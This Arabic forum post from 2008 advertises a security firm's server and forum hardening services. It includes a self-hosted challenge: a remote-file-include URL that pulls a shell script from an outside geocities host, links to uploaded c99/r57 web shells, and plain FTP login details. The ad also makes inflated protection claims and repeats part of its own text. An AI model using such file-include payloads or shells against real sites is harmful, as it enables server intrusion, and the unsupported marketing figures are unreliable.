SecuritySniper
06-04-2008, 02:05 PM
<P>
بسم الله الرحمن الرحيم<BR> <BR>
السلام عليكم ورحمة الله وبركاته<BR> <BR>
http://www.sec-gate.com/111a.jpg (<A href='http://www.sec-gate.com)[/CENTER'>http://www.sec-gate.com"]http://www.sec-gate.com/111a.jpg[/URL][/COLOR][/CENTER</A>]<BR> <BR> <BR>
بوابة الحماية تقدم أقوى حمايات السيرفرات والمواقع والمنتديات<BR>
لدينا فريق أمني لمعالجة السيرفرات والمواقع والمنتديات لتكثيف حمايتها و لزيادة سرعتها وتقليل اللود<BR>
نضمن لك أقوى حماية :)<BR> <BR>
افتح هالصفحه واقرأ بعض أعمالنا<BR>
http://www.sec-gate.com/vps-server.html<BR>
مع العلم ان بامكاننا تشفير المصدر .. والغرض من هذه الخدمة .. حماية أسماء المجلدات من كشفها من قبل الأشخاص أو محركات البحث<BR> <BR>
ومن أشكال الحماية اللتي نقدمها للسيرفرات :<BR> <BR>
<BR>[CENTER]تركيب عدة فايروولات .. ومنها IPTables , ABF , CSF , BFD , Kiss My Firewall .. بالإضافة إلى:<BR>
- إقفال جميع المنافذ عدى الضرورية<BR>
- منع الإتصال بالسيرفر<BR>
- منع الإتصالات العكسية<BR>
- عدم إظهار أي معلومات عن السيرفر عند فحصه ببرامج الفحص مثل nmap<BR>
تركيب SELinux لسيرفرات اللينكس للحماية القصوى بإذن الله<BR>
تركيب برامج فحص الملفات تلقائياً مع التحديث اليومي .. ومنها AVG Scanner و ClamAV<BR>
تركيب نظام IDS لكشف اي عمليه قد تضر بالسيرفر<BR>
تركيب نظام Jaeling لحماية المستخدمين<BR>
إيقاف عمل الــ shells بشكل يصل إلى عدم عرضها وإرسال المخترق إلى صفحة الحماية<BR>
إخفاء معلومات السيرفر للحمايه القصوى مثل Server Type<BR>
chroot لكلاً من Apache و BIND لإلغاء الخطر منه<BR>
إلغاء خطر سكربتات perl ( كالإمتداد pl و pp .. إلخ )<BR>
إلغاء خطر سكربتات CGI<BR>
إستخدام نظام SUexec للـ Perl وإستخدام إعدادات خاصه للـ PHP<BR>
إستخدام إعدادات خاصة للـ PHP بالإضافة إلى عمل كلاً من :<BR>
+ تفعيل الوضع الأمن<BR>
+ تعطيل الدوال الخطيرة<BR>
+ تفعيل open_basedir<BR>
+ تفعيل mod_userdir<BR>
+ تعطيل بعض الخصائص لزيادة الحماية بشكل كبير بإذن الله<BR>
+ تنصيب eAccelerator لتسريع التصفح<BR>
+ تنصيب Zend Optimizer <BR>
+ تنصيب وإعداد Suhosin لإضافة طبقة حماية كبيرة<BR>
إستخدام إعدادات خاصة للـ MYSQL <BR>
إعداد Exim وتأمينه عن طريق :<BR>
+ حماية من السبام<BR>
+ حماية من الفايروسات<BR>
+ blacklists <BR>
+ هجوم Dictionary Attack<BR>
تركيب اعدادات خاصه للأباتشى للحمايه من الأختراق وتخفيف الحمل عن السيرفر<BR>
إعداد وحماية وتأمين SSH .. ويشمل كلاً من :<BR>
- منع دخول SSH غير آمن <BR>
- تغيير المنفذ الإفتراضي<BR>
- منع الجذر من الدخول بشكل مباشر <BR>
- إضافة مستخدم له صلاحية الدخول ثم التغيير إلى صلاحية الجذر<BR>
- الحماية من هجوم Dictionary Attack وعمل حظر عند محاولات الدخول بعد عدد معين<BR>
- منع الدخول إلا من ip محدد ( حسب الرغبة )<BR>
- منع الدخول إلا عن طريق المفتاح الخاص ( طبقة عالية من الحماية ) ( حسب الرغبة )<BR>
- إرسال تنبيه عند الدخول إلى الــ SSH بصلاحيات الروت<BR>
ارسال بريد فى حالة دخول ROOT الى السيرفر لضمان عدم دخول اى افراد غير مرغوبين<BR>
إعداد وتأمين كلاً من : WHM , Cpanel , Apache .. بالإضافة إلى عمل كلاَ من :<BR>
- إعادة إعداد وتحديث برنامج ( Brute Force Detection ) لمنع وحجب محاولات تخمين كلمات سر أسماء المستخدمين<BR>
- منع الدخول إلى WHM/Cpanel إلا لـــ ip محدد ( حسب الطلب )<BR>
- ضبط الإعدادات بشكل سليم وبما يناسب سيرفر العميل<BR>
- ضبط صلاحيات بعض المجلدات<BR>
- إخفاء بعض المجلدات الغير ضرورية مثل manual<BR>
- تركيب Mod_Evasive وإعدادها بشكل سليم للحمايه من هجوم حجب الخدمة<BR>
- تركيب Mod_Security للحماية من مخاطر تطبيقات الويب بالإضافة إلى وضع قوانين تعمل على إيقاف عمل ثغرات :<BR>
+ + Sql Injection<BR>
+ + Command Exiction<BR>
+ + local file include<BR>
+ + remote file include<BR>
+ + Xss<BR>
منع استخدام الهاكرز لبعض الأدوات مثل wget و links و elinks و lynx و rcp و scp<BR>
منع استخدام اي يوزر غير root لاي برنامج ترجمه gcc او kgcc او perlcc او byacc او yacc او bcc او cc وغيرهم <BR>
البحث عن اي روت كت وحذفه .. مع تركيب برامج RootKIT Hunter و ChkRootKIT و RKHunter .. مع تقرير اسبوعي<BR>
حماية المجلدات الهامه مثل etc و tmp و var/tmp و dev/shm<BR>
إعادة إعداد ملفات ( host.conf , nsswitch.conf , sysctl.conf ) للحماية من الفلود وهجمات ( syn-flood ) و ( DNS spoofing )<BR>
منع محاولات التخمين على ملفات الــ .htaccess<BR>
منع جميع هجمات DNS Attacks و DDoS & DoS Attacks و Spoofing Attacks .. مثل :<BR>
- IP spoofing<BR>
- DNS Spoofing<BR>
- DNS Hijacking<BR>
- DNS Cahce Poisoning<BR>
- DNS DDoS attacks<BR>
- DDOS attacks<BR>
- SYN-Flood attacks <BR>
إغلاق ثغرة Open DNS <BR>
فحص قواعد البيانات وإعدادات MySql<BR>
فحص دوري لبرامج الخادم<BR>
فحص دوري لملفات المستخدمين والبحث عن اي مشاكل أمنيه<BR>
تركيب برامج لإبلاغ الإيميل عن اي شل موجود في السيرفر<BR>
الحمايه من السبام والفلود في سكربتات php<BR>
حماية السيرفر من الـ Cron Jobs<BR>
تشفير ملفات الـ configs بواسطة الزند ( آخر إصدار )<BR>
تركيب بعض البرامج لأخذ Logs كامله للسيرفر ... مثل LogWatch وغيره<BR>
مراجعة ملفات logs بشكل دوري<BR>
تركيب برامج المراقبه الاخرى مثل Linux Socket Monitor لمراقبة البورتات و Process Resource Monitor لمراقبة البرامج<BR>
وايضاً تركيب System Integrity Monitor و Linux Environment Security<BR>
مراجعة التحديثات للبرامج .. وتحديث برامج الخادم.. الـ Kernel مع الـ Grsecurity و الـ Cpanel و الـ OpenSSL والـ OpenSSH والـ Zend و الـ BIND9<BR>
وايضاً تحديثات PHP و MySQL و Apache و ModSecurity High Rules و ModSecurity2 و انواع اخرى من Mods<BR>
ومن الأنواع الأخرى .. ModPerl ( او Perl Modules ) وجميع سكربتات الحمايه من ملفات البيرل pl<BR>
عمل BackUp إحتياطي على نفس السيرفر وايضاُ على سيرفراتنا المحميه ( إذا اردت )<BR>
سكان لملفات السيرفر .. والتدقيق في المجلدات اللي تحمل تصريح 777 ومسح الباك دور والشلات<BR>
نظام الحمايه من جميع أنواع الفلود DoS و DDoS و SYN وAntiflood مع التحديثات الدوريه<BR>
عمل تجارب على السيرفر لمعرفة مستوى الحمايه<BR>
فحص السيرفر من جميع البورتات المفتوحه ( نعمل أكثر من 10 فحوصات )<BR>
فحص بعض البرامج عن طريق البورتات مثل Telnet و FTP و DNS غيرها<BR>
الفحص عبر إستخدام قاعدة بيانات الثغرات المنتشره من Securityfocus و Milw0rm والثغرات الـ Priv8 .. أكثر من 1600 عملية مراقبه<BR>
تقرير أمني شامل .. لذكر جميع الثغرات وعرض مستوى حماية الخادم لديك<BR>
بعض أنواع الثغرات اللتي يتم فحصها هي:<BR> <BR>
Overflow Exploits ... Buffer - Heap - Stack - BufferStack - BufferHeap <BR>
Remote Root Exploits <BR>
Local Root Exploits <BR>
Default Accounts Exploits <BR>
Remote File Include <BR>
Remote File Sharing <BR>
Permission 777 Folders <BR>
General Exploits <BR>
FTP , Telnet , DNS <BR>
XSS , SQL , MySql Errors <BR>
CISCO Exploits <BR>
SMTP & SNMP <BR>
Ports Scanning <BR>
Invalid Settings <BR>
Firewalls <BR>
Back Connect <BR>
Backdoors <BR>
CGI Exploits <BR>
DDoS , NIS <BR>
Others : robots.txt , favicon.ico , Invalid Links <BR> <BR>
مع إرفاق النتائج بالتقارير الموضحه لحالة الموقع قبل وبعد .. بالجداول والرسوم البيانيه <BR> <BR><BR> <BR> <BR> <BR> <BR> <BR>
ومن أشكال الحماية اللي نقدمها لحماية المواقع المشتركة <BR> <BR>
<BR>
البحث عن ملفات التجسس ( من Backdoors و Sniffers وغيرها )على الموقع وحذفها<BR>
الحد من صلاحيات الملفات والمجلدات<BR>
تعديل خصائص PHP للموقع لتفعيل الحماية الداخلية<BR>
الحماية من ملفات السكربتات الضاره<BR>
فحص الموقع من جميع أنواع الثغرات ( SQL Injection - XSS - RFI - LFI - LRE )<BR>
إغلاق المنافذ الخطره لمنع هجمات الـ DDoS و DNS Attacks و Openssl وغيرها<BR>
حجب الدوال والخدمات الخطره<BR>
تشغيل بعض سكربتاتنا للحماية الدورية مع تبليغ صاحب الموقع وإنذار المخترق<BR>
زيادة سرعة التصفح بتقليل اللود على بعض برامج السيرفر<BR>
وضع جدران حماية خاصة للمجلدات الهامه<BR>
تغيير اماكن واسماء ملفات الباسوردات<BR>
فحص جميع السكربتات الموجوده بواسطة قاعدة بيانات ضخمه<BR>
فحص السيرفر للتأكد من مستوى الحمايه<BR>
إبلاغ الشركه المسؤوله عند وجود ثغره على السيرفر<BR>
الحماية من هجمات الإنترنت ( مثل Brute Force Attack و Birthday Attack وغيرها )<BR>
إعداد الـ ModSecurity<BR>
إعداد .htaccess و .htpasswd<BR>
تشفير ملفات الباسورد<BR>
وضع باك آب على نفس السيرفر وخارجه<BR> <BR>
ولدينا بعض الطرق المبتكره .. لن نعرضها للعامة .. وسنعرضها فقط لعملائنا<BR> <BR><BR> <BR> <BR>
ومن أشكال الحماية اللتي نقدمها لحماية المنتديات<BR> <BR>
<BR> <BR>
فحص هاكات المنتدى والتأكده من خلوها من الثغرات<BR>
فحص بعض الملفات الخطرة وإلغاء ثغرات الفايل انكلود .. كـ showgroups.php و memberlist.php و online.php<BR>
تعطيل ثغرات xss بإضافة لستة الكلمات الممنوعة<BR>
تغيير اسماء بعض المجلدات مثل admincp و modcp ( حسب الطلب )<BR>
ضبط التصاريح لمجلد المنتدى و includes و admincp و modcp و archive<BR>
ضبط التصاريح لمجلد .htpasswds لإخفاء المسارات<BR>
إستخدام الزند Zend في التشفير<BR>
نضع جدار حماية مقدم من عندنا + جدار حماية من Cpanel على مجلدات لوحة التحكم و الإعدادات مثل includes و modcp و admincp والمجلد الذي يحتوي على config.php<BR>
نضع جدار حماية على الارشيف مع إلغاءه<BR>
تغيير مسميات (class_core.php - global.php - init.php) في جميع ملفات المنتدى<BR>
تشفير الكوكيز<BR>
تغيير مسمى مجلد includes مع التعديل في جميع أكواد ملفات المنتدى.<BR>
تشفير ملف config.php وتغير مكانه و اسمه و إمتداده و الـ prefix <BR>
تغيير متغيرات ومصفوفات الكونفيق<BR>
تعطيل دوال php مثل دالة open_basedir ودالة symlink .. وتشغيل Safemod للحماية من الهجوم الداخلي<BR>
مراقبة ملفات المنتدى وفحص الهاكات لتأكيد خلوها من الأخطاء البرمجيه<BR>
التأكد من تحديثات PHP - Apache وإعداد الـ ModSecurity<BR>
وضع Backup للمنتدى على المنتدى نفسه ( في الستايل) وعلى نفس السيرفر و خارج السيرفر <BR>
إستخدام طرق اخرى كـ htaccess . و .htpasswd<BR>
تحديث المنتدى للإصدار المحمي<BR>
تغيير رقم userid لصاحب المنتدى<BR>
إستخدام سكربتات من برمجتنا الخاصه .. لمنع بعض الأكواد ومنع تشغيل الشلات<BR>
فحص الموقع للتأكد من خلوه من السكربتات اللتي تحتوي على ثغرات كـ RFI و SQL و XSS وغيرها<BR><BR> <BR> <BR> <BR>
لو نبي نتكلم عن اقل شيء نقدر نسويه .. <BR>
هذه صوره للشل تطلع على جميع مواقعك لو كنت صاحب سيرفر<BR> <BR>
http://www.sec-gate.com/1s.jpg<BR>
( صوره لشل على موقعنا )<BR> <BR>
وبعد فتح داله واحده فقط .. اصبح الشل هكذا<BR>
http://www.sec-gate.com/2ss.jpg<BR> <BR> <BR>
او نستطيع عمل صفحة لتحويل الشل عليها عند الدخول عليه واخذ المعلومات وإرسالها بالتقرير<BR> <BR>
http://www.sec-gate.com/g.jpg<BR> <BR>
هل لاحظت شيء ؟<BR>
الوضع الآمن فعال .. لكن بدون دوال معطلة<BR> <BR>
في الحقيقة تم تعطيل 100 دالة تقريباَ + تشغيل السيف مود + تركيب سكربت لتعديل الدوال من برمجتنا<BR>
100 دالة .. بدون اي مشاكل لا للسكربتات ولا للمنتديات .. تم تجربة الدوال وتصفيتها أكثر من مرة<BR> <BR> <BR>
ومثال على حمايتنا .. هذا تقييم الحماية .. والتقييم تم من قبل برنامج CSF اول ماتركب على السيرفر<BR>
http://www.sec-gate.com/2.jpg<BR>
( والحماية عندنا 99.99% -- مافي شيء في العالم كامل .. الكامل الله سبحانه -- )<BR>
( تقييم CSF )<BR>
+<BR>
ضمان سنه كامله<BR>
+<BR>
دعم فني متواصل<BR>
+<BR>
http://www.sec-gate.com/prices.html<BR>
أسعار لا تتجاوز 600 ريال سعودي للسيرفر<BR> <BR>
+<BR>
لدينا خدمات اخرى .. مثل<BR>
المراقبة 24/7<BR>
المتابعة الدورية<BR>
التقارير النصية او البيانية<BR>
منع الفلود والسبام<BR>
خدمة سكربتات بوابة الحماية<BR> <BR>
وهذه الوصلات ايضاً جزء مما نقدمه لحماية المواقع :<BR>
http://www.sec-gate.com/website-reseller.html<BR>
ولحماية المنتديات :<BR>
http://www.sec-gate.com/vb.html<BR> <BR>
وايضاً .. من خدماتنا .. إعداد السيرفر وتجهيزه<BR>
والبحث عن اسباب زيادة اللود<BR>
صور لسرعة سيرفرنا بعد عملية الإعداد وتقليل اللود<BR> <BR>
http://www.sec-gate.com/b.jpg<BR> <BR>
من خدماتنا إعداد السيرفر وتجهيزه وحمايته .. والبحث عن اسباب زيادة اللود وغيرها<BR> <BR>
هذه الصوره بعد أكثر من فحص .. الأول كان : 0.52 والثاني كان : 0.38 والثالث : 0.45<BR>
وتم اختيار المتوسط<BR>
مع العلم ان النتائج الثلاث كلها أسرع من قوقل ..والسيرفر يحتوي على صفحات وصور في الصفحة الرئيسية<BR>
أكثر من صفحات وصور قوقل في الصفحة الرئيسيه<BR>
ويحتوي على أكثر من موقع ومنتدى<BR> <BR>
صور اخرى :<BR> <BR>
http://www.sec-gate.com/d.JPG<BR> <BR>
مقارنة بين السيرفر وبين قوقل<BR>
http://www.sec-gate.com/aaa.jpg<BR>
عدم تمكنك من عرض اليوزرات .. مثل<BR>
http://67.222.1.67/~root<BR> <BR> <BR>
الآن :<BR>
شل على موقعنا :<BR>
http://www.sec-gate.com/a2.php<BR> <BR>
ثغرة على موقعنا :<BR>
http://www.sec-gate.com/order.php?showlink=1&fid=8&p=links&area=1&categ=http://www.sec-gate.com/a2.txt<BR>
تقدر تستخدم شل بديل مثل <BR>
http://www.sec-gate.com/order.php?showlink=1&fid=8&p=links&area=1&categ=http://www.geocities.com/helloooaja/cmd.txt<BR> <BR> <BR> <BR>
الشل المرفوع سابقاً .. تم إستثناءه من الفايروول<BR>
لكن تم رفع 3 شلات .. ولم يتم استثنائها<BR> <BR>
هل بإمكانك الدخول عليها ؟<BR> <BR>
http://www.sec-gate.com/c99shell.php<BR>
http://www.sec-gate.com/sniper_sa2.php<BR>
http://www.sec-gate.com/r57shell.php<BR> <BR>
ملف خاطئ : لإثبات ان الملفات السابقه مرفوعه <BR>
http://www.sec-gate.com/oj.php<BR> <BR>
ملاحظه :<BR>
صفحة security.php .. هي مجرد مثال ..بمعنى انها لا تسجل معلوماتك <BR> <BR>
عملاء الاسبوع : ( حماية ) <BR>
http://www.takempire.com<BR>
http://www.d45d.com<BR>
http://www.b84b.com/vb<BR>
http://www.etsalati.com/vb<BR>
http://www.almadaya.com<BR>
http://www.bnatqtr.com/vb<BR>
http://www.al-mjd.com<BR>
http://www.fdool.com/vb<BR>
http://www.altayyar.net/vb<BR> <BR>
بإمكانك الإطلاع على المزيد من خلال زيارة موقعنا<BR>WWW.SEC-GATE.COM (<A href='http://www.SEC-GATE.com)[/CENTER'>http://www.SEC-GATE.com"]WWW.SEC-GATE.COM[/URL][/CENTER</A>]<BR> <BR>
قريباً .. تصميم جديد للموقع<BR> <BR>
الأسعار :<BR>
http://www.sec-gate.com/pN.jpg<BR> <BR> <BR>
وللطلب (رسالة ) :<BR>
sales@sec-gate.com (<A href='mailto:sales@sec-gate.com)[/CENTER'>sales@sec-gate.com"]sales@sec-gate.com[/EMAIL][/CENTER</A>]<BR> <BR> <BR>الاسبوع هذا .. تم تطوير مايلي :<BR>1- سكربت لفحص تغيرات الاندكسات وإرسال تنبيه لأصحابها والروت<BR>2- سكربت لإيقاف الشلات الضاره phpshells<BR>3- إيقاف أوامر perl الضاره .. بدون إيقاف سكربتات البيرل لكي لاتأثر على الـ cpanel<BR>4- تعطيل جميع الثغرات والشلات مع تحويلها لصفحة أمان وجمع معلومات الشخص اللذي حاول تجربتها<BR>5- بورت ssh متغير وغير ثابت<BR>6- رولز جديده للمود سكيورتي لإيقاف جميع انواع الثغرات من تطويرنا <BR>7- تشفير الـ config.php بتقنية جديده غير الزند لكي لايتم كسرها <BR> <BR>والمزيد ...<BR> <BR> <BR> <BR>[CENTER]واخيراً<BR> <BR>
يسألني اكثر من شخص .. يقولي ليه الشل اللي كنت رافعه تم تعديله ؟<BR> <BR> <BR> <BR>
وفي الحقيقه الشل لم يتم تعديل ولا حرف فيه<BR> <BR> <BR> <BR> <BR>
هذه معلومات الاف تي بي<BR> <BR> <BR> <BR>
FTP Username:traidnt@sec-gate.com</P>
<P>
FTP Password: 123456<BR>[CENTER]FTP Server: ftp.sec-gate.com<BR>
FTP Server Port: 21<BR></P>
<P> <BR> <BR> <BR> <BR>
Path : http://www.sec-gate.com/traidnt<BR> <BR> <BR> <BR> <BR> <BR>
مواقع على نفس السيرفر :<BR> <BR> <BR> <BR>
http://www.sec-gate.com</P>
<P>
http://www.hack-gate.com</P>
<P> <BR> <BR>
مع تحياتنا<BR>
فريق بوابة الحماية الأمني | Security Gate Team </P>
بسم الله الرحمن الرحيم<BR> <BR>
السلام عليكم ورحمة الله وبركاته<BR> <BR>
http://www.sec-gate.com/111a.jpg (<A href='http://www.sec-gate.com)[/CENTER'>http://www.sec-gate.com"]http://www.sec-gate.com/111a.jpg[/URL][/COLOR][/CENTER</A>]<BR> <BR> <BR>
بوابة الحماية تقدم أقوى حمايات السيرفرات والمواقع والمنتديات<BR>
لدينا فريق أمني لمعالجة السيرفرات والمواقع والمنتديات لتكثيف حمايتها و لزيادة سرعتها وتقليل اللود<BR>
نضمن لك أقوى حماية :)<BR> <BR>
افتح هالصفحه واقرأ بعض أعمالنا<BR>
http://www.sec-gate.com/vps-server.html<BR>
مع العلم ان بامكاننا تشفير المصدر .. والغرض من هذه الخدمة .. حماية أسماء المجلدات من كشفها من قبل الأشخاص أو محركات البحث<BR> <BR>
ومن أشكال الحماية اللتي نقدمها للسيرفرات :<BR> <BR>
<BR>[CENTER]تركيب عدة فايروولات .. ومنها IPTables , ABF , CSF , BFD , Kiss My Firewall .. بالإضافة إلى:<BR>
- إقفال جميع المنافذ عدى الضرورية<BR>
- منع الإتصال بالسيرفر<BR>
- منع الإتصالات العكسية<BR>
- عدم إظهار أي معلومات عن السيرفر عند فحصه ببرامج الفحص مثل nmap<BR>
تركيب SELinux لسيرفرات اللينكس للحماية القصوى بإذن الله<BR>
تركيب برامج فحص الملفات تلقائياً مع التحديث اليومي .. ومنها AVG Scanner و ClamAV<BR>
تركيب نظام IDS لكشف اي عمليه قد تضر بالسيرفر<BR>
تركيب نظام Jaeling لحماية المستخدمين<BR>
إيقاف عمل الــ shells بشكل يصل إلى عدم عرضها وإرسال المخترق إلى صفحة الحماية<BR>
إخفاء معلومات السيرفر للحمايه القصوى مثل Server Type<BR>
chroot لكلاً من Apache و BIND لإلغاء الخطر منه<BR>
إلغاء خطر سكربتات perl ( كالإمتداد pl و pp .. إلخ )<BR>
إلغاء خطر سكربتات CGI<BR>
إستخدام نظام SUexec للـ Perl وإستخدام إعدادات خاصه للـ PHP<BR>
إستخدام إعدادات خاصة للـ PHP بالإضافة إلى عمل كلاً من :<BR>
+ تفعيل الوضع الأمن<BR>
+ تعطيل الدوال الخطيرة<BR>
+ تفعيل open_basedir<BR>
+ تفعيل mod_userdir<BR>
+ تعطيل بعض الخصائص لزيادة الحماية بشكل كبير بإذن الله<BR>
+ تنصيب eAccelerator لتسريع التصفح<BR>
+ تنصيب Zend Optimizer <BR>
+ تنصيب وإعداد Suhosin لإضافة طبقة حماية كبيرة<BR>
إستخدام إعدادات خاصة للـ MYSQL <BR>
إعداد Exim وتأمينه عن طريق :<BR>
+ حماية من السبام<BR>
+ حماية من الفايروسات<BR>
+ blacklists <BR>
+ هجوم Dictionary Attack<BR>
تركيب اعدادات خاصه للأباتشى للحمايه من الأختراق وتخفيف الحمل عن السيرفر<BR>
إعداد وحماية وتأمين SSH .. ويشمل كلاً من :<BR>
- منع دخول SSH غير آمن <BR>
- تغيير المنفذ الإفتراضي<BR>
- منع الجذر من الدخول بشكل مباشر <BR>
- إضافة مستخدم له صلاحية الدخول ثم التغيير إلى صلاحية الجذر<BR>
- الحماية من هجوم Dictionary Attack وعمل حظر عند محاولات الدخول بعد عدد معين<BR>
- منع الدخول إلا من ip محدد ( حسب الرغبة )<BR>
- منع الدخول إلا عن طريق المفتاح الخاص ( طبقة عالية من الحماية ) ( حسب الرغبة )<BR>
- إرسال تنبيه عند الدخول إلى الــ SSH بصلاحيات الروت<BR>
ارسال بريد فى حالة دخول ROOT الى السيرفر لضمان عدم دخول اى افراد غير مرغوبين<BR>
إعداد وتأمين كلاً من : WHM , Cpanel , Apache .. بالإضافة إلى عمل كلاَ من :<BR>
- إعادة إعداد وتحديث برنامج ( Brute Force Detection ) لمنع وحجب محاولات تخمين كلمات سر أسماء المستخدمين<BR>
- منع الدخول إلى WHM/Cpanel إلا لـــ ip محدد ( حسب الطلب )<BR>
- ضبط الإعدادات بشكل سليم وبما يناسب سيرفر العميل<BR>
- ضبط صلاحيات بعض المجلدات<BR>
- إخفاء بعض المجلدات الغير ضرورية مثل manual<BR>
- تركيب Mod_Evasive وإعدادها بشكل سليم للحمايه من هجوم حجب الخدمة<BR>
- تركيب Mod_Security للحماية من مخاطر تطبيقات الويب بالإضافة إلى وضع قوانين تعمل على إيقاف عمل ثغرات :<BR>
+ + Sql Injection<BR>
+ + Command Exiction<BR>
+ + local file include<BR>
+ + remote file include<BR>
+ + Xss<BR>
منع استخدام الهاكرز لبعض الأدوات مثل wget و links و elinks و lynx و rcp و scp<BR>
منع استخدام اي يوزر غير root لاي برنامج ترجمه gcc او kgcc او perlcc او byacc او yacc او bcc او cc وغيرهم <BR>
البحث عن اي روت كت وحذفه .. مع تركيب برامج RootKIT Hunter و ChkRootKIT و RKHunter .. مع تقرير اسبوعي<BR>
حماية المجلدات الهامه مثل etc و tmp و var/tmp و dev/shm<BR>
إعادة إعداد ملفات ( host.conf , nsswitch.conf , sysctl.conf ) للحماية من الفلود وهجمات ( syn-flood ) و ( DNS spoofing )<BR>
منع محاولات التخمين على ملفات الــ .htaccess<BR>
منع جميع هجمات DNS Attacks و DDoS & DoS Attacks و Spoofing Attacks .. مثل :<BR>
- IP spoofing<BR>
- DNS Spoofing<BR>
- DNS Hijacking<BR>
- DNS Cahce Poisoning<BR>
- DNS DDoS attacks<BR>
- DDOS attacks<BR>
- SYN-Flood attacks <BR>
إغلاق ثغرة Open DNS <BR>
فحص قواعد البيانات وإعدادات MySql<BR>
فحص دوري لبرامج الخادم<BR>
فحص دوري لملفات المستخدمين والبحث عن اي مشاكل أمنيه<BR>
تركيب برامج لإبلاغ الإيميل عن اي شل موجود في السيرفر<BR>
الحمايه من السبام والفلود في سكربتات php<BR>
حماية السيرفر من الـ Cron Jobs<BR>
تشفير ملفات الـ configs بواسطة الزند ( آخر إصدار )<BR>
تركيب بعض البرامج لأخذ Logs كامله للسيرفر ... مثل LogWatch وغيره<BR>
مراجعة ملفات logs بشكل دوري<BR>
تركيب برامج المراقبه الاخرى مثل Linux Socket Monitor لمراقبة البورتات و Process Resource Monitor لمراقبة البرامج<BR>
وايضاً تركيب System Integrity Monitor و Linux Environment Security<BR>
مراجعة التحديثات للبرامج .. وتحديث برامج الخادم.. الـ Kernel مع الـ Grsecurity و الـ Cpanel و الـ OpenSSL والـ OpenSSH والـ Zend و الـ BIND9<BR>
وايضاً تحديثات PHP و MySQL و Apache و ModSecurity High Rules و ModSecurity2 و انواع اخرى من Mods<BR>
ومن الأنواع الأخرى .. ModPerl ( او Perl Modules ) وجميع سكربتات الحمايه من ملفات البيرل pl<BR>
عمل BackUp إحتياطي على نفس السيرفر وايضاُ على سيرفراتنا المحميه ( إذا اردت )<BR>
سكان لملفات السيرفر .. والتدقيق في المجلدات اللي تحمل تصريح 777 ومسح الباك دور والشلات<BR>
نظام الحمايه من جميع أنواع الفلود DoS و DDoS و SYN وAntiflood مع التحديثات الدوريه<BR>
عمل تجارب على السيرفر لمعرفة مستوى الحمايه<BR>
فحص السيرفر من جميع البورتات المفتوحه ( نعمل أكثر من 10 فحوصات )<BR>
فحص بعض البرامج عن طريق البورتات مثل Telnet و FTP و DNS غيرها<BR>
الفحص عبر إستخدام قاعدة بيانات الثغرات المنتشره من Securityfocus و Milw0rm والثغرات الـ Priv8 .. أكثر من 1600 عملية مراقبه<BR>
تقرير أمني شامل .. لذكر جميع الثغرات وعرض مستوى حماية الخادم لديك<BR>
بعض أنواع الثغرات اللتي يتم فحصها هي:<BR> <BR>
Overflow Exploits ... Buffer - Heap - Stack - BufferStack - BufferHeap <BR>
Remote Root Exploits <BR>
Local Root Exploits <BR>
Default Accounts Exploits <BR>
Remote File Include <BR>
Remote File Sharing <BR>
Permission 777 Folders <BR>
General Exploits <BR>
FTP , Telnet , DNS <BR>
XSS , SQL , MySql Errors <BR>
CISCO Exploits <BR>
SMTP & SNMP <BR>
Ports Scanning <BR>
Invalid Settings <BR>
Firewalls <BR>
Back Connect <BR>
Backdoors <BR>
CGI Exploits <BR>
DDoS , NIS <BR>
Others : robots.txt , favicon.ico , Invalid Links <BR> <BR>
مع إرفاق النتائج بالتقارير الموضحه لحالة الموقع قبل وبعد .. بالجداول والرسوم البيانيه <BR> <BR><BR> <BR> <BR> <BR> <BR> <BR>
ومن أشكال الحماية اللي نقدمها لحماية المواقع المشتركة <BR> <BR>
<BR>
البحث عن ملفات التجسس ( من Backdoors و Sniffers وغيرها )على الموقع وحذفها<BR>
الحد من صلاحيات الملفات والمجلدات<BR>
تعديل خصائص PHP للموقع لتفعيل الحماية الداخلية<BR>
الحماية من ملفات السكربتات الضاره<BR>
فحص الموقع من جميع أنواع الثغرات ( SQL Injection - XSS - RFI - LFI - LRE )<BR>
إغلاق المنافذ الخطره لمنع هجمات الـ DDoS و DNS Attacks و Openssl وغيرها<BR>
حجب الدوال والخدمات الخطره<BR>
تشغيل بعض سكربتاتنا للحماية الدورية مع تبليغ صاحب الموقع وإنذار المخترق<BR>
زيادة سرعة التصفح بتقليل اللود على بعض برامج السيرفر<BR>
وضع جدران حماية خاصة للمجلدات الهامه<BR>
تغيير اماكن واسماء ملفات الباسوردات<BR>
فحص جميع السكربتات الموجوده بواسطة قاعدة بيانات ضخمه<BR>
فحص السيرفر للتأكد من مستوى الحمايه<BR>
إبلاغ الشركه المسؤوله عند وجود ثغره على السيرفر<BR>
الحماية من هجمات الإنترنت ( مثل Brute Force Attack و Birthday Attack وغيرها )<BR>
إعداد الـ ModSecurity<BR>
إعداد .htaccess و .htpasswd<BR>
تشفير ملفات الباسورد<BR>
وضع باك آب على نفس السيرفر وخارجه<BR> <BR>
ولدينا بعض الطرق المبتكره .. لن نعرضها للعامة .. وسنعرضها فقط لعملائنا<BR> <BR><BR> <BR> <BR>
ومن أشكال الحماية اللتي نقدمها لحماية المنتديات<BR> <BR>
<BR> <BR>
فحص هاكات المنتدى والتأكده من خلوها من الثغرات<BR>
فحص بعض الملفات الخطرة وإلغاء ثغرات الفايل انكلود .. كـ showgroups.php و memberlist.php و online.php<BR>
تعطيل ثغرات xss بإضافة لستة الكلمات الممنوعة<BR>
تغيير اسماء بعض المجلدات مثل admincp و modcp ( حسب الطلب )<BR>
ضبط التصاريح لمجلد المنتدى و includes و admincp و modcp و archive<BR>
ضبط التصاريح لمجلد .htpasswds لإخفاء المسارات<BR>
إستخدام الزند Zend في التشفير<BR>
نضع جدار حماية مقدم من عندنا + جدار حماية من Cpanel على مجلدات لوحة التحكم و الإعدادات مثل includes و modcp و admincp والمجلد الذي يحتوي على config.php<BR>
نضع جدار حماية على الارشيف مع إلغاءه<BR>
تغيير مسميات (class_core.php - global.php - init.php) في جميع ملفات المنتدى<BR>
تشفير الكوكيز<BR>
تغيير مسمى مجلد includes مع التعديل في جميع أكواد ملفات المنتدى.<BR>
تشفير ملف config.php وتغير مكانه و اسمه و إمتداده و الـ prefix <BR>
تغيير متغيرات ومصفوفات الكونفيق<BR>
تعطيل دوال php مثل دالة open_basedir ودالة symlink .. وتشغيل Safemod للحماية من الهجوم الداخلي<BR>
مراقبة ملفات المنتدى وفحص الهاكات لتأكيد خلوها من الأخطاء البرمجيه<BR>
التأكد من تحديثات PHP - Apache وإعداد الـ ModSecurity<BR>
وضع Backup للمنتدى على المنتدى نفسه ( في الستايل) وعلى نفس السيرفر و خارج السيرفر <BR>
إستخدام طرق اخرى كـ htaccess . و .htpasswd<BR>
